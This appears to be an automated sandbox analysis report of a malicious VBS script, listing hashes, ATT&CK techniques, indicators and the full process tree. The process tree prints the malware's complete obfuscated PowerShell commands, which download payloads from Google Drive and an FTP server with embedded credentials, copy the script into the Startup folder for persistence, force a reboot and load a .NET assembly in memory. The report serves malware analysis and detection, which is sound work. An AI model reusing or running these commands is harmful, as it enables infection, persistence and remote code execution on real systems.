bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933

General

Target

bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs
Size

165KB
MD5

34f854905f0f1cfb29f41736b34c84d2
SHA1

777d4629fd82935f3760168cc95cd12a69701425
SHA256

bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933
SHA512

5a671989c7924466b249a5fe0d75667e820bb75d82fcd6e613211cb721b41eb7f2f84c8ffbb5df4fd08277c3e9350714dd9764a7cc5f65286b51807e11cb97dd
SSDEEP

3072:V0Z0Z0Z0Z0Z0Z0Z0Z0Z06K0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0Z0p:q

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2800	powershell.exe
7	2800	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2800	powershell.exe
2192	powershell.exe
2344	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2344	powershell.exe
2800	powershell.exe
2536	powershell.exe
2192	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2948 wrote to memory of 2344	2948	WScript.exe	31
PID 2948 wrote to memory of 2344	2948	WScript.exe	31
PID 2948 wrote to memory of 2344	2948	WScript.exe	31
PID 2344 wrote to memory of 2800	2344	powershell.exe	33
PID 2344 wrote to memory of 2800	2344	powershell.exe	33
PID 2344 wrote to memory of 2800	2344	powershell.exe	33
PID 2800 wrote to memory of 2536	2800	powershell.exe	34
PID 2800 wrote to memory of 2536	2800	powershell.exe	34
PID 2800 wrote to memory of 2536	2800	powershell.exe	34
PID 2536 wrote to memory of 3024	2536	powershell.exe	35
PID 2536 wrote to memory of 3024	2536	powershell.exe	35
PID 2536 wrote to memory of 3024	2536	powershell.exe	35
PID 2800 wrote to memory of 2192	2800	powershell.exe	36
PID 2800 wrote to memory of 2192	2800	powershell.exe	36
PID 2800 wrote to memory of 2192	2800	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fvgwr = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARA' + [char]66 + 'EACcAIAAsACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAIAAsACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AcA' + [char]66 + 'hAHMAdA' + [char]66 + 'lAC4AZQ' + [char]66 + 'lAC8AZAAvADEAMw' + [char]66 + 'QAHYAeQAvADAAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAbQ' + [char]66 + 'HAHEAaQ' + [char]66 + 'uACQAIAAoAGQAbw' + [char]66 + 'oAHQAZQ' + [char]66 + 'NAHQAZQ' + [char]66 + 'HAC4AKQAgAEUAZg' + [char]66 + 'YAHMAZwAkACAAKwAgAEcAaQ' + [char]66 + 'UAHoASgAkACAAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAPQAgAG0ARw' + [char]66 + 'xAGkAbgAkADsAJwAxAHMAcw' + [char]66 + 'hAGwAQwAnACAAPQAgAEUAZg' + [char]66 + 'YAHMAZwAkADsAJwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAgAD0AIA' + [char]66 + 'HAGkAVA' + [char]66 + '6AEoAJAA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkADsAKQAgACkAJw' + [char]66 + '' + [char]66 + 'ACcALAAnAJMhOgCTIScAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'yAC4AcQ' + [char]66 + '2AHoAZA' + [char]66 + '5ACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'zAFsAIAA9ACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAgACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'xAHYAeg' + [char]66 + 'kAHkAJAA7ACAAIA' + [char]66 + '9ACAAZw' + [char]66 + 'uAGkAcw' + [char]66 + 'yAGEAUA' + [char]66 + 'jAGkAcw' + [char]66 + 'hAEIAZQ' + [char]66 + 'zAFUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAZQ' + [char]66 + 'sAGkARg' + [char]66 + '0AHUATwAtACAAaw' + [char]66 + 'qAHoAaw' + [char]66 + '6ACQAIA' + [char]66 + 'JAFIAVQAtACAAdA' + [char]66 + 'zAGUAdQ' + [char]66 + 'xAGUAUg' + [char]66 + 'iAGUAVwAtAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JADsAIAApACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgAGsAag' + [char]66 + '6AGsAegAkADsAIAApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACgAIAA9ACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAewAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAMQAuADAALgAwAC4ANwAyADEAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'wADsAIA' + [char]66 + 'jAC8AIA' + [char]66 + 'lAHgAZQAuAGQAbQ' + [char]66 + 'jADsAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAYwAkACAAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAtACAAZw' + [char]66 + 'uAGkAcw' + [char]66 + 'yAGEAUA' + [char]66 + 'jAGkAcw' + [char]66 + 'hAEIAZQ' + [char]66 + 'zAFUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAZQ' + [char]66 + 'sAGkARg' + [char]66 + '0AHUATwAtACAAcg' + [char]66 + '2AHMAYg' + [char]66 + 'mACQAIA' + [char]66 + 'JAFIAVQAtACAAdA' + [char]66 + 'zAGUAdQ' + [char]66 + 'xAGUAUg' + [char]66 + 'iAGUAVwAtAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JADsAKQApACkAKQApACAANAA2ACwANAA2ACwANgA1ACwANQA1ACwAMwA1ACwAOQA0ACwAOQA4ACwANwA3ACwANgA2ACwANQA4ACwAIAA3ADkALAAgADEAMgAxACwAIAAxADcAIAAsADkAMQAxACAALAAwADcAIAAsADYANgAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMALQAgAGUAYw' + [char]66 + 'yAG8ARgAtACAAdA' + [char]66 + '4AGUAVA' + [char]66 + 'uAGkAYQ' + [char]66 + 'sAFAAcw' + [char]66 + '' + [char]66 + 'AC0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'lAHIAdQ' + [char]66 + 'jAGUAUwAtAG8AVA' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DACgAIAAsACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'TAFAAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAYwAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAUQ' + [char]66 + 'HAHAAZQ' + [char]66 + 'JACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + 'yAHYAcw' + [char]66 + 'iAGYAJAA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAcg' + [char]66 + '2AG4ARw' + [char]66 + 'vACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAcg' + [char]66 + '2AG4ARw' + [char]66 + 'vACQAKAAgACwAaA' + [char]66 + 'zAHcAdA' + [char]66 + 'tACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAG4AbQ' + [char]66 + 'nAHYAcAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'uAG0AZw' + [char]66 + '2AHAAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'uAG0AZw' + [char]66 + '2AHAAJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAGgAcw' + [char]66 + '3AHQAbQAkACgAIAA9ACAAaA' + [char]66 + 'zAHcAdA' + [char]66 + 'tACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAaA' + [char]66 + 'zAHcAdA' + [char]66 + 'tACQAKAAgAD0AIA' + [char]66 + 'oAHMAdw' + [char]66 + '0AG0AJA' + [char]66 + '7ACAAKQAgAGwAZQ' + [char]66 + '6AGYARgAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAbA' + [char]66 + 'lAHoAZg' + [char]66 + 'GACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAGgAcw' + [char]66 + '3AHQAbQAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHIAdg' + [char]66 + 'uAEcAbwAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'yAHYAbg' + [char]66 + 'HAG8AJA' + [char]66 + '7ACAAKQAgAEcAdQ' + [char]66 + 'PAEYAUgAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEcAdQ' + [char]66 + 'PAEYAUgAkACAAOwA=';$fvgwr = $fvgwr.replace('уЦϚ' , 'B') ;;$ykcxg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $fvgwr ) ); $ykcxg = $ykcxg[-1..-$ykcxg.Length] -join '';$ykcxg = $ykcxg.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs');powershell $ykcxg
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $RFOuG = $host.Version.Major.Equals(2) ;if ( $RFOuG ) {$oGnvr = [System.IO.Path]::GetTempPath();del ( $oGnvr + '\Upwin.msu' );$mtwsh = 'https://drive.google.com/uc?export=download&id=';$Ffzel = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Ffzel ) {$mtwsh = ($mtwsh + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$mtwsh = ($mtwsh + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$pvgmn = (New-Object Net.WebClient);$pvgmn.Encoding = [System.Text.Encoding]::UTF8;$pvgmn.DownloadFile($mtwsh, ($oGnvr + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($oGnvr + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$fbsvr = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $fbsvr -OutFile $IepGQ -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$IepGQ = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$zkzjk = ( Get-Content -Path $IepGQ ) ;Invoke-WebRequest -URI $zkzjk -OutFile $IepGQ -UseBasicParsing } ;$ydzvq = (Get-Content -Path $IepGQ -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ydzvq.replace('↓:↓','A') );$sNwoM = 'C:\Users\Admin\AppData\Local\Temp\bd3b1910de0908ebf93905730c594ab28058103110ab459ce3e4920b4d193933.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( '0/yvP31/d/ee.etsap//:sptth' , $sNwoM , 'DDDRegAsm' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2536
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:3024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
70f8cdb19d49f253687e4386d1c9c565

SHA1
8755635e5e79bed107a234900caf342019a63bee

SHA256
d50408d77628cd88bc512ff2f31aec895a45f41f7d5af534238049fe82f7bbdc

SHA512
f32b8cafcad1b15eeca2569e14e089e8d83755d7d1a84670228e1b0e871e5869f1591542bcb93ed3ad58673828531a0abc99452d9c5dabd9af6b40c33eb1c036

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aa4ebbea6f96327bc514c5323a5713ec

SHA1
abc84b33ea976443704c7434f253e4a848ba0951

SHA256
83ac32ca8bcb4e08d881cefdfaf3b7df28245f17af3f71b2811b642bbd6e544d

SHA512
59ac5164b627ee23cd988f4f023699ed3f5dda2e14ff0ff50912fc3838a33dc54e89089938e9a9c8a74d0c5eda885404d5e39e2e82541a55b6c96f4bffd4b42c

Download Submit
memory/2344-4-0x000007FEF681E000-0x000007FEF681F000-memory.dmp

Filesize
4KB

Download
memory/2344-5-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2344-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2344-12-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

Filesize
9.6MB

Download
memory/2344-13-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

Filesize
9.6MB

Download
memory/2344-14-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

Filesize
9.6MB

Download
memory/2344-15-0x000007FEF681E000-0x000007FEF681F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing